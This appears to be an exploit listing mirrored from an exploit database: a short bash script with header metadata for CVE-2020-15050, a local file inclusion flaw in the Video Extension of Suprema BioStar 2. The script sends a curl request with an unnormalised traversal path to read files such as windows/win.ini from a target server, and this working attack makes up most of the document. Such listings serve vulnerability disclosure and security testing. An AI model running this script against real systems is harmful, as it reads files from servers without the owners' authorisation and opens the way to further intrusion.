Share
## https://sploitus.com/exploit?id=PACKETSTORM:158576
# Exploit Title: Bio Star 2.8.2 - Local File Inclusion  
# Authors: SITE Team (Rian Saaty, Bashaer AlHarthy, Safeyah Alhazmi)  
# Google Dork: N/A  
# Date of Exploit Release: 2020-07-13  
# Exploit Author: SITE Team  
# Vendor Homepage: https://www.supremainc.com/en/main.asp  
# Software Link: https://www.supremainc.com/en/support/biostar-2-pakage.asp  
# Version: Bio Star 2, Video Extension up to version 2.8.2  
# Tested on: Windows  
# CVE : CVE-2020-15050  
  
  
#!/bin/bash  
  
# Exploit Title: Video Extension of Bio Star up to 2.8.1 Local File Inclusion Exploit  
# Authors: SITE Team (Rian Saaty, Bashaer AlHarthy, Safeyah Alhazmi)  
# Google Dork: N/A  
# Date of Exploit Release: 13/7/2020  
# Exploit Author: SITE Team  
# Vendor Homepage: https://www.supremainc.com/en/main.asp  
# Software Link: https://www.supremainc.com/en/support/biostar-2-pakage.asp  
# Version: Bio Star 2, Video Extension up to version 2.8.1  
# Tested on: Windows  
# CVE : CVE-2020-15050  
  
echo "*********** SITE TEAM *********************"  
echo "*********** Video Extension of Bio Star 2 Local File Inclusion Exploit ***********"  
echo "*********** Rian Saaty, Bashaer AlHarthy, Safeyah Alhazmi *********************"  
  
if [ -z "$*" ]; then echo "Usage Example: ./exploit.sh https://website/ ../../../../../../../../../../../../windows/win.ini"  
echo "*******************************************"  
else  
args=("$@")  
curl -X GET --path-as-is -k ${args[0]}${args[1]}  
fi